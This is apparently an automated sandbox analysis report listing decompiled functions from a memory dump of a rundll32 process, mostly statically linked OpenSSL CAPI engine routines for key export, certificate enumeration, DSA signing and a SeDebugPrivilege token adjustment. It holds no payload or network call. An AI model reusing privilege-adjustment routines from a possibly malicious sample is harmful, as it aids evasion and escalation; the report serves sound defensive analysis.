                                        Yara matches
                                        Similarity
                                        • API ID: CryptEnumErrorLastProviders
                                        • String ID: %lX$%lu. %s, type %lu$..\..\openssl-1.1.0f\engines\e_capi.c$Available CSPs:$Error code= 0x$capi_get_provname, index=%d$capi_get_provname, returned name=%s, type=%d$capi_list_providers
                                        • API String ID: 747760079-1615478548
                                        • Opcode ID: 9e42e398c95e5916dc9c00ba49dd46682911d997c13105756202915f125ea00d
                                        • Instruction ID: c05dcf619205048a1c938ba7bfd7b1a67ee943eef9d8042b63d137661064f77a
                                        • Opcode Fuzzy Hash: 9e42e398c95e5916dc9c00ba49dd46682911d997c13105756202915f125ea00d
                                        • Instruction Fuzzy Hash: D061AD75304A4086FF609B65EC587DBA3A1F7A9B84F828026AD4A47FA5EF3CC507C744
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF304DED0 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 97encryptionCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: Crypt$Context$AcquireRandomRelease$CountCounterCurrentGlobalMemoryPerformanceProcessQueryStatusTick
                                        • String ID: @$Intel Hardware Cryptographic Service Provider
                                        • API String ID: 246993173-3158535399
                                        • Opcode ID: b16e02c7c9972d5a65446ae4ebd645c47c437f1e88be2293c061071ba27d192d
                                        • Instruction ID: 63296ce7fa3d3733788fbd55216012567c4753ef898a668482b764ff3fe66ac3
                                        • Opcode Fuzzy Hash: b16e02c7c9972d5a65446ae4ebd645c47c437f1e88be2293c061071ba27d192d
                                        • Instruction Fuzzy Hash: 76414D71614A4082FF619F21EC5C7D762B1FBA4B40F42C122EE4A46EA9DF3DC946CB10
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3017D40 Relevance: 19.3, APIs: 7, Strings: 4, Instructions: 57libraryloaderCOMMON
                                        Download Yara Rule
                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: AddressCloseHandleProc$CurrentLibraryLoadLookupPrivilegeProcessValue
                                        • String ID: AdjustTokenPrivileges$Advapi32.dll$OpenProcessToken$SeDebugPrivilege
                                        • API String ID: 1752774111-261832459
                                        • Opcode ID: f01c3b2a8d190324c0af41496456fbaa1b763869f9e634f14ab8525a95459cf4
                                        • Instruction ID: b13d777e5ef00787db3dd24666cca96613e8ad9c411535ccca2dae7b9caa0dd9
                                        • Opcode Fuzzy Hash: f01c3b2a8d190324c0af41496456fbaa1b763869f9e634f14ab8525a95459cf4
                                        • Instruction Fuzzy Hash: C821FC76614B4182DF409B55F84829AB3F0F7A9B94F458026EE8A87B28EE7CC559CB00
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF302F050 Relevance: 16.1, APIs: 2, Strings: 7, Instructions: 315encryptionCOMMONCrypto
                                        Download Yara Rule
                                        C-Code - Quality: 46%
                                        			E0000021E21EF302F050(void* __rax, long long __rbx, void* __rcx, long long __rdx, long long __rsi, long long __rbp, void* __r8, char _a8, long long _a16, long long _a24, char _a32, signed long long _a48, long long _a56, long long _a64, long long _a136) {
				long long _v0;
				long long _v8;
				void* __rdi;
				void* _t112;
				void* _t113;
				intOrPtr _t136;
				unsigned int _t141;
				signed long long _t176;
				char* _t178;
				long long _t179;
				long long _t181;
				char* _t182;
				intOrPtr _t185;
				long long _t216;
				void* _t222;
				void* _t223;
				void* _t227;
				long long _t229;
				long long _t232;
				void* _t233;
				void* _t234;
				void* _t235;
				long long _t238;
				long long _t239;
				void* _t241;
				char* _t256;
				char* _t257;
				void* _t262;
				long long _t264;
				void* _t266;

				_t238 = __rbp;
				_t232 = __rsi;
				_t216 = __rdx;
				_t181 = __rbx;
				E0000021E21EF310C220();
				_t176 =  *0xf3203000; // 0x1fc8e4a4378e
				_a48 = _t176 ^ _t241 - __rax;
				_t264 = __rdx;
				_a32 = __rdx;
				_t178 =  &_a8;
				_t262 = __rcx;
				_v0 = _t178;
				r14d = 0;
				r9d = 0;
				_t185 =  *((intOrPtr*)(__rdx + 0x10));
				r15d = 0;
				_v8 = _t229;
				_t7 = _t266 + 6; // 0x6
				r8d = _t7;
				__imp__CryptExportKey();
				if (0x70 != 0) goto 0xf302f0ef;
				if ( *0xf3209020 != 0) goto 0xf302f0c4;
				 *0xf3209020 = E0000021E21EF3021CE0(_t178);
				_v8 = 0x27d;
				_t256 = "..\\..\\openssl-1.1.0f\\engines\\e_capi.c";
				_t9 = _t216 + 2; // 0x75
				r8d = _t9;
				E0000021E21EF30222D0(_t58, 0x73,  *0xf3209020, _t178, __rbx, _t185, _t216, __rsi, __rbp, _t256);
				E0000021E21EF302DA10( *0xf3209020, _t178, _t216);
				goto 0xf302f56a;
				_t217 = "..\\..\\openssl-1.1.0f\\engines\\e_capi.c";
				_a136 = _t181;
				r8d = 0x282;
				_a64 = _t238;
				_a56 = _t232;
				E0000021E21EF3025700();
				_t182 = _t178;
				if (_t178 == 0) goto 0xf302f4f7;
				_t179 =  &_a8;
				r9d = 0;
				_v0 = _t179;
				_v8 = _t182;
				_t18 = _t256 + 6; // 0x6
				r8d = _t18;
				__imp__CryptExportKey();
				if (0 != 0) goto 0xf302f187;
				if ( *0xf3209020 != 0) goto 0xf302f15e;
				 *0xf3209020 = E0000021E21EF3021CE0(_t179);
				_v8 = 0x288;
				_t257 = "..\\..\\openssl-1.1.0f\\engines\\e_capi.c";
				_t20 = _t217 + 1; // 0x74
				r8d = _t20;
				E0000021E21EF30222D0(_t63, 0x73,  *0xf3209020, _t179, _t182,  *((intOrPtr*)(_t264 + 0x10)), "..\\..\\openssl-1.1.0f\\engines\\e_capi.c", _t232, _t238, _t257);
				E0000021E21EF302DA10( *0xf3209020, _t179, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				goto 0xf302f52b;
				if ( *_t182 == 6) goto 0xf302f1b6;
				if ( *0xf3209020 != 0) goto 0xf302f1a1;
				 *0xf3209020 = E0000021E21EF3021CE0(_t179);
				_v8 = 0x28f;
				r8d = 0x73;
				goto 0xf302f51d;
				r9d =  *((intOrPtr*)(_t182 + 4));
				if ((_t257 - 0x00002400 & 0xffff7fff) == 0) goto 0xf302f3da;
				if (r9d != 0x2200) goto 0xf302f375;
				r9d =  *((intOrPtr*)(_t182 + 8));
				if (r9d == 0x31535344) goto 0xf302f224;
				E0000021E21EF3026420(_t179,  &_a32, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c", "%lx", _t257);
				if ( *0xf3209020 != 0) goto 0xf302f211;
				 *0xf3209020 = E0000021E21EF3021CE0(_t179);
				_v8 = 0x2ca;
				r8d = 0x7a;
				goto 0xf302f420;
				_t30 = _t182 + 0x10; // 0x10
				_t233 = _t30;
				_t141 =  *(_t182 + 0xc) >> 3;
				E0000021E21EF3040380( *0xf3209020, _t179, _t182, _t262, _t233, _t238);
				if (_t179 == 0) goto 0xf302f4f7;
				E0000021E21EF3043D30(_t179, _t179, _t233, _t238);
				_a24 = _t179;
				E0000021E21EF3043D30(_t179, _t179, _t233, _t238);
				_t263 = _t179;
				E0000021E21EF3043D30(_t179, _t179, _t233, _t238);
				_t265 = _t179;
				E0000021E21EF3043D30(_t179, _t179, _t233, _t238);
				_a16 = _t179;
				if (_a24 == 0) goto 0xf302f356;
				if (_t179 == 0) goto 0xf302f356;
				if (_t179 == 0) goto 0xf302f356;
				if (_t179 == 0) goto 0xf302f356;
				E0000021E21EF3040600(_t179, _t182, _t179, _a24, _t233, _t238, _t179, _t179);
				r8d = 0;
				E0000021E21EF3040580(_t179, _t182, _t179, _a16, _t233, _t179);
				r8d = _t141;
				if (E0000021E21EF3030F40(_t113, 0xa, _t179, _a24, _t233) == 0) goto 0xf302f4f7;
				r8d = 0x14;
				_t234 = _t233 + _t179;
				if (E0000021E21EF3030F40(_t113, 0xa, _t179, _t179, _t234) == 0) goto 0xf302f4f7;
				_t235 = _t234 + 0x14;
				r8d = _t141;
				_t222 = _t235;
				if (E0000021E21EF3030F40(_t113, 0xa, _t179, _t179, _t222) == 0) goto 0xf302f4f7;
				r8d = _t141;
				_t223 = _t222 + _t235;
				if (E0000021E21EF3030F40(_t113, _t141, _t179, _a16, _t223) == 0) goto 0xf302f4f7;
				0xf30406a0();
				E0000021E21EF30472C0(E0000021E21EF3030F40(_t113, _t141, _t179, _a16, _t223), _t179, _t235, _t238);
				if (_t179 == 0) goto 0xf302f4f7;
				0xf3046de0();
				r15d = 0;
				goto 0xf302f52b;
				E0000021E21EF3043B20(_t179, _t179);
				E0000021E21EF3043B20(_t179, _t263);
				E0000021E21EF3043B20(_t179, _t179);
				goto 0xf302f4f2;
				E0000021E21EF3026420(_t179,  &_a32, _t223, "%ux", _t265);
				if ( *0xf3209020 != 0) goto 0xf302f3a0;
				 *0xf3209020 = E0000021E21EF3021CE0(_t179);
				_v8 = 0x2f9;
				_t41 = _t223 + 6; // 0x79
				r8d = _t41;
				E0000021E21EF30222D0(_t90, 0x73,  *0xf3209020, _t179, _t182,  &_a32, _t223, _t235, _t238, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				E0000021E21EF3021640(2, _t179, "aiKeyAlg=0x",  &_a32, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				goto 0xf302f52b;
				r9d =  *((intOrPtr*)(_t182 + 8));
				if (r9d == 0x31415352) goto 0xf302f44e;
				E0000021E21EF3026420(_t179,  &_a32, "aiKeyAlg=0x", "%lx", "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				if ( *0xf3209020 != 0) goto 0xf302f412;
				 *0xf3209020 = E0000021E21EF3021CE0(_t179);
				_v8 = 0x29c;
				r8d = 0x7b;
				E0000021E21EF30222D0(_t95, 0x73,  *0xf3209020, _t179, _t182,  &_a32, "aiKeyAlg=0x", _t235, _t238, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				E0000021E21EF3021640(2, _t179, "magic=0x",  &_a32, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				goto 0xf302f52b;
				E0000021E21EF303F960( *0xf3209020, _t179, _t182, _t263, _t235, _t238);
				if (_t179 == 0) goto 0xf302f4f7;
				E0000021E21EF3043D30(_t179, _t179, _t235, _t238);
				_t239 = _t179;
				E0000021E21EF3043D30(_t179, _t179, _t235, _t239);
				_t236 = _t179;
				if (_t239 == 0) goto 0xf302f4e7;
				if (_t179 == 0) goto 0xf302f4e7;
				r9d = 0;
				E0000021E21EF303FB40(_t179, _t182, _t179, _t179, _t179, _t239, _t239, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				if (E0000021E21EF3044090(_t179, _t182, _t239, _t179) == 0) goto 0xf302f4f7;
				r8d =  *(_t182 + 0xc);
				_t49 = _t182 + 0x14; // 0x14
				_t227 = _t49;
				r8d = r8d >> 3;
				if (E0000021E21EF3030F40(_t113,  *((intOrPtr*)(_t182 + 0x10)), _t179, _t179, _t227) == 0) goto 0xf302f4f7;
				_t136 =  *0xf31e78d8; // 0xffffffff
				E0000021E21EF303FBE0(_t136, _t179, _t179, _t179, _t179, _t239);
				E0000021E21EF30472C0(E0000021E21EF3030F40(_t113,  *((intOrPtr*)(_t182 + 0x10)), _t179, _t179, _t227), _t179, _t179, _t239);
				if (_t179 == 0) goto 0xf302f4f7;
				0xf3046de0();
				r14d = 0;
				goto 0xf302f52b;
				E0000021E21EF3043B20(_t179, _t239);
				E0000021E21EF3043B20(_t179, _t236);
				if ( *0xf3209020 != 0) goto 0xf302f50c;
				 *0xf3209020 = E0000021E21EF3021CE0(_t179);
				_v8 = 0x30a;
				_t51 = _t227 - 0x32; // 0x41
				r8d = _t51;
				E0000021E21EF30222D0(_t109, 0x73,  *0xf3209020, _t179, _t182, _t236, _t227, _t236, _t239, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				r8d = 0x2ff;
				E0000021E21EF3025750();
				if (_t179 != 0) goto 0xf302f567;
				E0000021E21EF303F7E0(0x73, _t179, _t179, _t179, _a56, _a64);
				_t112 = E0000021E21EF3040240(0x73, _t179, _t179, _t179, _a56, _a64);
				E0000021E21EF310C290();
				return _t112;
			}

































                                        0x21ef302f050
                                        0x21ef302f050
                                        0x21ef302f050
                                        0x21ef302f050
                                        0x21ef302f05f
                                        0x21ef302f067
                                        0x21ef302f071
                                        0x21ef302f076
                                        0x21ef302f079
                                        0x21ef302f07e
                                        0x21ef302f083
                                        0x21ef302f086
                                        0x21ef302f08b
                                        0x21ef302f090
                                        0x21ef302f093
                                        0x21ef302f099
                                        0x21ef302f09c
                                        0x21ef302f0a1
                                        0x21ef302f0a1
                                        0x21ef302f0a5
                                        0x21ef302f0ad
                                        0x21ef302f0b7
                                        0x21ef302f0be
                                        0x21ef302f0c9
                                        0x21ef302f0d1
                                        0x21ef302f0da
                                        0x21ef302f0da
                                        0x21ef302f0de
                                        0x21ef302f0e3
                                        0x21ef302f0ea
                                        0x21ef302f0f3
                                        0x21ef302f0fa
                                        0x21ef302f102
                                        0x21ef302f108
                                        0x21ef302f10d
                                        0x21ef302f112
                                        0x21ef302f117
                                        0x21ef302f11d
                                        0x21ef302f127
                                        0x21ef302f12c
                                        0x21ef302f12f
                                        0x21ef302f136
                                        0x21ef302f13b
                                        0x21ef302f13b
                                        0x21ef302f13f
                                        0x21ef302f147
                                        0x21ef302f151
                                        0x21ef302f158
                                        0x21ef302f163
                                        0x21ef302f16b
                                        0x21ef302f174
                                        0x21ef302f174
                                        0x21ef302f178
                                        0x21ef302f17d
                                        0x21ef302f182
                                        0x21ef302f18a
                                        0x21ef302f194
                                        0x21ef302f19b
                                        0x21ef302f1a6
                                        0x21ef302f1ae
                                        0x21ef302f1b1
                                        0x21ef302f1b6
                                        0x21ef302f1c6
                                        0x21ef302f1d3
                                        0x21ef302f1d9
                                        0x21ef302f1e4
                                        0x21ef302f1f7
                                        0x21ef302f204
                                        0x21ef302f20b
                                        0x21ef302f211
                                        0x21ef302f219
                                        0x21ef302f21f
                                        0x21ef302f227
                                        0x21ef302f227
                                        0x21ef302f22e
                                        0x21ef302f231
                                        0x21ef302f23c
                                        0x21ef302f242
                                        0x21ef302f247
                                        0x21ef302f24c
                                        0x21ef302f251
                                        0x21ef302f254
                                        0x21ef302f259
                                        0x21ef302f25c
                                        0x21ef302f266
                                        0x21ef302f26e
                                        0x21ef302f277
                                        0x21ef302f280
                                        0x21ef302f289
                                        0x21ef302f29b
                                        0x21ef302f2a5
                                        0x21ef302f2ab
                                        0x21ef302f2b5
                                        0x21ef302f2c2
                                        0x21ef302f2ca
                                        0x21ef302f2d0
                                        0x21ef302f2e0
                                        0x21ef302f2e6
                                        0x21ef302f2ea
                                        0x21ef302f2ed
                                        0x21ef302f2fa
                                        0x21ef302f305
                                        0x21ef302f30a
                                        0x21ef302f314
                                        0x21ef302f328
                                        0x21ef302f32d
                                        0x21ef302f338
                                        0x21ef302f349
                                        0x21ef302f34e
                                        0x21ef302f351
                                        0x21ef302f356
                                        0x21ef302f35e
                                        0x21ef302f366
                                        0x21ef302f370
                                        0x21ef302f386
                                        0x21ef302f393
                                        0x21ef302f39a
                                        0x21ef302f3a5
                                        0x21ef302f3b6
                                        0x21ef302f3b6
                                        0x21ef302f3ba
                                        0x21ef302f3d0
                                        0x21ef302f3d5
                                        0x21ef302f3da
                                        0x21ef302f3e5
                                        0x21ef302f3f8
                                        0x21ef302f405
                                        0x21ef302f40c
                                        0x21ef302f412
                                        0x21ef302f41a
                                        0x21ef302f42e
                                        0x21ef302f444
                                        0x21ef302f449
                                        0x21ef302f451
                                        0x21ef302f45c
                                        0x21ef302f462
                                        0x21ef302f467
                                        0x21ef302f46a
                                        0x21ef302f46f
                                        0x21ef302f475
                                        0x21ef302f47a
                                        0x21ef302f47c
                                        0x21ef302f488
                                        0x21ef302f49a
                                        0x21ef302f49c
                                        0x21ef302f4a0
                                        0x21ef302f4a0
                                        0x21ef302f4a4
                                        0x21ef302f4b2
                                        0x21ef302f4b4
                                        0x21ef302f4c0
                                        0x21ef302f4c5
                                        0x21ef302f4d0
                                        0x21ef302f4dd
                                        0x21ef302f4e2
                                        0x21ef302f4e5
                                        0x21ef302f4ea
                                        0x21ef302f4f2
                                        0x21ef302f4ff
                                        0x21ef302f506
                                        0x21ef302f511
                                        0x21ef302f519
                                        0x21ef302f519
                                        0x21ef302f526
                                        0x21ef302f52b
                                        0x21ef302f53b
                                        0x21ef302f555
                                        0x21ef302f55a
                                        0x21ef302f562
                                        0x21ef302f572
                                        0x21ef302f584

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CryptExport
                                        • String ID: %lx$%ux$..\..\openssl-1.1.0f\engines\e_capi.c$DSS1$RSA1$aiKeyAlg=0x$magic=0x
                                        • API String ID: 3389274496-2803325008
                                        • Opcode ID: 1927bf09b0e8788728698409766e1937571a13029584711ed29007a180a88e5c
                                        • Instruction ID: 0c45f5e17bb98fb5c3aab62d0d7e4219f0e8385a8b8e83a0af86d01ce00a7415
                                        • Opcode Fuzzy Hash: 1927bf09b0e8788728698409766e1937571a13029584711ed29007a180a88e5c
                                        • Instruction Fuzzy Hash: 22D16E7130464186FE60EB62EC19BDB62A1BBA5BC4F524016AE0987F96DF3CC907C744
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF3030380 Relevance: 15.9, APIs: 7, Strings: 2, Instructions: 192encryptionCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 64%
                                        			E0000021E21EF3030380(void* __rax, long long __rcx, long long __rdx, long long __r8, long long __r9, long long _a8, long long _a16, long long _a24, long long _a32, long long* _a112) {
				void* __rbx;
				void* __rsi;
				void* __rbp;
				void* _t9;
				intOrPtr _t10;
				void* _t15;
				intOrPtr _t17;
				long long _t24;
				void* _t25;

				_t15 = __rax;
				_a32 = __r9;
				_a24 = __r8;
				_a16 = __rdx;
				_a8 = __rcx;
				E0000021E21EF310C220();
				_t10 =  *0xf31e78c4; // 0xffffffff
				E0000021E21EF30311E0(__rax, __rcx);
				 *((long long*)(__r9)) = _t24;
				 *_a112 = _t24;
				_t17 =  *((intOrPtr*)(_t15 + 0x30));
				_t23 =  !=  ? _t17 : "MY";
				_t9 = E0000021E21EF3030650(_t10, _t17, __r9, _t15,  !=  ? _t17 : "MY", _t24, _t25, __r9);
				if (_t17 != 0) goto 0xf3030400;
				return _t9;
			}












                                        0x21ef3030380
                                        0x21ef3030380
                                        0x21ef3030385
                                        0x21ef303038a
                                        0x21ef303038f
                                        0x21ef30303a2
                                        0x21ef30303aa
                                        0x21ef30303ba
                                        0x21ef30303c2
                                        0x21ef30303d7
                                        0x21ef30303da
                                        0x21ef30303e1
                                        0x21ef30303e5
                                        0x21ef30303f0
                                        0x21ef30303ff

                                        APIs
                                        Strings
                                        Memory Dump Source
                                        • Source File: 00000003.00000002.779447807.0000021EF2FE0000.00000040.10000000.00040000.00000000.sdmp, Offset: 0000021EF2FE0000, based on PE: true
                                        Joe Sandbox IDA Plugin
                                        • Snapshot File: hcaresult_3_2_21ef2fe0000_rundll32.jbxd
                                        Yara matches
                                        Similarity
                                        • API ID: CertStore$CertificatesEnum$CloseOpen
                                        • String ID: ..\..\openssl-1.1.0f\engines\e_capi.c$Can't Parse Certificate %d
                                        • API String ID: 3767857896-627055899
                                        • Opcode ID: 9cbf45b68ae5f2f7670d2f4477fd40b5a2bc759a01f6cb3c21d718e428ffb6e9
                                        • Instruction ID: 8e917f3a1335588b20da4e0eaa9ce2f2d1f4a4e61dcef21b164db69713ecbfe9
                                        • Opcode Fuzzy Hash: 9cbf45b68ae5f2f7670d2f4477fd40b5a2bc759a01f6cb3c21d718e428ffb6e9
                                        • Instruction Fuzzy Hash: 0671717230274086EE64AB16EC587EBA3A1BBA5FC0F4684229D4A47F56EE3CC517C344
                                        Uniqueness

                                        Uniqueness Score: -1.00%

                                        Function 0000021EF302E300 Relevance: 12.5, APIs: 4, Strings: 3, Instructions: 216encryptionCOMMON
                                        Download Yara Rule
                                        C-Code - Quality: 42%
                                        			E0000021E21EF302E300(void* __edx, void* __eflags, void* __rax, long long __rbx, void* __rcx, long long __rsi, void* __r8, void* __r9, long long _a8, long long _a16, long long _a32, void* _a88) {
				signed long long _v32;
				char _v52;
				signed char _v53;
				signed char _v54;
				signed char _v55;
				signed char _v56;
				signed char _v57;
				signed char _v58;
				signed char _v59;
				signed char _v60;
				signed char _v61;
				signed char _v62;
				signed int _v63;
				signed int _v64;
				signed int _v65;
				signed int _v66;
				signed int _v67;
				signed int _v68;
				signed int _v69;
				signed int _v70;
				signed int _v71;
				signed int _v72;
				char _v80;
				char _v88;
				void* __rbp;
				void* _t95;
				void* _t117;
				void* _t118;
				void* _t147;
				void* _t149;
				signed long long _t167;
				signed long long _t168;
				long long _t171;
				void* _t174;
				char* _t195;
				void* _t203;

				_t199 = __rsi;
				_t149 = __eflags;
				_a16 = __rbx;
				_a32 = __rsi;
				_t202 = _t203;
				E0000021E21EF310C220();
				_t167 =  *0xf3203000; // 0x1fc8e4a4378e
				_t168 = _t167 ^ _t203 - __rax;
				_v32 = _t168;
				_t174 = __r8;
				_t147 = __edx;
				E0000021E21EF3040300(0x70, __r8);
				E0000021E21EF30311E0(_t168, _t168);
				_t195 = "Called CAPI_dsa_do_sign()\n";
				E0000021E21EF302D790(_t168, _t195, __r8, __r9);
				E0000021E21EF3040340(_t149, _t168, _t174, _t174, __rsi, _t203);
				_t175 = _t168;
				if (_t168 != 0) goto 0xf302e3ac;
				if ( *0xf3209020 != 0) goto 0xf302e386;
				 *0xf3209020 = E0000021E21EF3021CE0(_t168);
				_a8 = 0x3e3;
				_t5 = _t195 - 0xd; // 0x65
				r8d = _t5;
				E0000021E21EF30222D0(_t80, 0x72,  *0xf3209020, _t168, _t168, _t174, _t195, __rsi, _t203, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				goto 0xf302e634;
				if (_t147 == 0x14) goto 0xf302e3ec;
				if ( *0xf3209020 != 0) goto 0xf302e3c6;
				 *0xf3209020 = E0000021E21EF3021CE0(_t168);
				_a8 = 0x3e8;
				_t7 = _t195 + 0xa; // 0x7c
				r8d = _t7;
				E0000021E21EF30222D0(_t84, 0x72,  *0xf3209020, _t168, _t168, _t174, _t195, _t199, _t203, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				goto 0xf302e634;
				_t169 =  &_v80;
				r9d = 0;
				_a8 =  &_v80;
				r8d = 0;
				__imp__CryptCreateHash();
				if (0 != 0) goto 0xf302e44e;
				if ( *0xf3209020 != 0) goto 0xf302e423;
				 *0xf3209020 = E0000021E21EF3021CE0( &_v80);
				_a8 = 0x3ee;
				_t12 = _t195 - 0xf; // 0x63
				r8d = _t12;
				E0000021E21EF30222D0(_t88, 0x72,  *0xf3209020,  &_v80, _t168,  *((intOrPtr*)(_t175 + 8)), _t195, _t199, _t203, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				E0000021E21EF302DA10( *0xf3209020,  &_v80, _t195);
				goto 0xf302e634;
				r9d = 0;
				__imp__CryptSetHashParam();
				if (0 != 0) goto 0xf302e4a4;
				if ( *0xf3209020 != 0) goto 0xf302e47b;
				 *0xf3209020 = E0000021E21EF3021CE0(_t169);
				_a8 = 0x3f5;
				_t16 = _t195 - 0xc; // 0x66
				r8d = _t16;
				E0000021E21EF30222D0(_t93, 0x72,  *0xf3209020, _t169, _t175, _v80, _t195, _t199, _t202, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				_t95 = E0000021E21EF302DA10( *0xf3209020, _t169, _t195);
				goto 0xf302e619;
				_a16 =  &_v88;
				r9d = 0;
				_t171 =  &_v72;
				_v88 = 0x28;
				r8d = 0;
				_a8 = _t171;
				__imp__CryptSignHashW();
				if (_t95 != 0) goto 0xf302e512;
				_t159 =  *0xf3209020;
				if ( *0xf3209020 != 0) goto 0xf302e4e9;
				 *0xf3209020 = E0000021E21EF3021CE0(_t171);
				_a8 = 0x3fd;
				_t25 = _t195 - 3; // 0x6f
				r8d = _t25;
				E0000021E21EF30222D0(_t97, 0x72,  *0xf3209020, _t171, _t175, _v80, _t195, _t199, _t202, "..\\..\\openssl-1.1.0f\\engines\\e_capi.c");
				E0000021E21EF302DA10( *0xf3209020, _t171, _t195);
				goto 0xf302e619;
				E0000021E21EF3043D30( *0xf3209020, _t171, _t199, _t202);
				_t198 = _t171;
				E0000021E21EF3043D30(_t159, _t171, _t199, _t202);
				_t176 = _t171;
				if (_t171 == 0) goto 0xf302e609;
				if (_t171 == 0) goto 0xf302e609;
				_v53 = _v72 & 0x000000ff;
				_v72 = _v53 & 0x000000ff;
				_v54 = _v71 & 0x000000ff;
				_v71 = _v54 & 0x000000ff;
				_v55 = _v70 & 0x000000ff;
				_v70 = _v55 & 0x000000ff;
				_v56 = _v69 & 0x000000ff;
				_v69 = _v56 & 0x000000ff;
				_v57 = _v68 & 0x000000ff;
				_v68 = _v57 & 0x000000ff;
				_v58 = _v67 & 0x000000ff;
				_v67 = _v58 & 0x000000ff;
				_v59 = _v66 & 0x000000ff;
				_v66 = _v59 & 0x000000ff;
				_v60 = _v65 & 0x000000ff;
				_v65 = _v60 & 0x000000ff;
				_v61 = _v64 & 0x000000ff;
				_v64 = _v61 & 0x000000ff;
				_v62 = _v63 & 0x000000ff;
				_v63 = _v62 & 0x000000ff;
				E0000021E21EF3043370(0x14, _t171, _t171,  &_v72, _t202, _t171);
				if (_t171 == 0) goto 0xf302e609;
				r8d = 0x14;
				if (E0000021E21EF3030F40(_t118, 0x14, _t171, _t171,  &_v52) == 0) goto 0xf302e609;
				E0000021E21EF3046060(E0000021E21EF3030F40(_t118, 0x14, _t171, _t171,  &_v52), _t171, _t199, _t202);
				if (_t171 == 0) goto 0xf302e609;
				E0000021E21EF30460C0(_t171, _t171, _t171, _t171, _t171, _t176);
				goto 0xf302e619;
				E0000021E21EF3043B20(_t171, _t198);
				_t117 = E0000021E21EF3043B20(_t171, _t176);
				E0000021E21EF302A640();
				__imp__CryptDestroyHash();
				E0000021E21EF310C290();
				return _t117;
			}







































                                        0x21ef302e300
                                        0x21ef302e300
                                        0x21ef302e300
                                        0x21ef302e305
                                        0x21ef302e30e
                                        0x21ef302e316
                                        0x21ef302e31e
                                        0x21ef302e325
                                        0x21ef302e328
                                        0x21ef302e32f
                                        0x21ef302e335
                                        0x21ef302e339
                                        0x21ef302e347
                                        0x21ef302e34c
                                        0x21ef302e356
                                        0x21ef302e364
                                        0x21ef302e369
                                        0x21ef302e36f
                                        0x21ef302e379
                                        0x21ef302e380
                                        0x21ef302e38b
                                        0x21ef302e39c
                                        0x21ef302e39c
                                        0x21ef302e3a0
                                        0x21ef302e3a7
                                        0x21ef302e3af
                                        0x21ef302e3b9
                                        0x21ef302e3c0
                                        0x21ef302e3cb
                                        0x21ef302e3dc
                                        0x21ef302e3dc
                                        0x21ef302e3e0
                                        0x21ef302e3e7
                                        0x21ef302e3f0
                                        0x21ef302e3f4
                                        0x21ef302e3f7
                                        0x21ef302e3fc
                                        0x21ef302e404
                                        0x21ef302e40c
                                        0x21ef302e416
                                        0x21ef302e41d
                                        0x21ef302e428
                                        0x21ef302e439
                                        0x21ef302e439
                                        0x21ef302e43d
                                        0x21ef302e442
                                        0x21ef302e449
                                        0x21ef302e452
                                        0x21ef302e45c
                                        0x21ef302e464
                                        0x21ef302e46e
                                        0x21ef302e475
                                        0x21ef302e480
                                        0x21ef302e491
                                        0x21ef302e491
                                        0x21ef302e495
                                        0x21ef302e49a
                                        0x21ef302e49f
                                        0x21ef302e4ac
                                        0x21ef302e4b1
                                        0x21ef302e4b4
                                        0x21ef302e4b8
                                        0x21ef302e4c2
                                        0x21ef302e4c5
                                        0x21ef302e4ca
                                        0x21ef302e4d2
                                        0x21ef302e4da
                                        0x21ef302e4dc
                                        0x21ef302e4e3
                                        0x21ef302e4ee
                                        0x21ef302e4ff
                                        0x21ef302e4ff
                                        0x21ef302e503
                                        0x21ef302e508
                                        0x21ef302e50d
                                        0x21ef302e512
                                        0x21ef302e517
                                        0x21ef302e51a
                                        0x21ef302e51f
                                        0x21ef302e525
                                        0x21ef302e52e
                                        0x21ef302e544
                                        0x21ef302e54b
                                        0x21ef302e552
                                        0x21ef302e559
                                        0x21ef302e560
                                        0x21ef302e567
                                        0x21ef302e56e
                                        0x21ef302e575
                                        0x21ef302e57c
                                        0x21ef302e583
                                        0x21ef302e58a
                                        0x21ef302e591
                                        0x21ef302e598
                                        0x21ef302e59f
                                        0x21ef302e5a6
                                        0x21ef302e5ad
                                        0x21ef302e5b4
                                        0x21ef302e5bb
                                        0x21ef302e5c2
                                        0x21ef302e5c9
                                        0x21ef302e5cc
                                        0x21ef302e5d4
                                        0x21ef302e5d6
                                        0x21ef302e5ea
                                        0x21ef302e5ec
                                        0x21ef302e5f7
                                        0x21ef302e602
                                        0x21ef302e607
                                        0x21ef302e60c
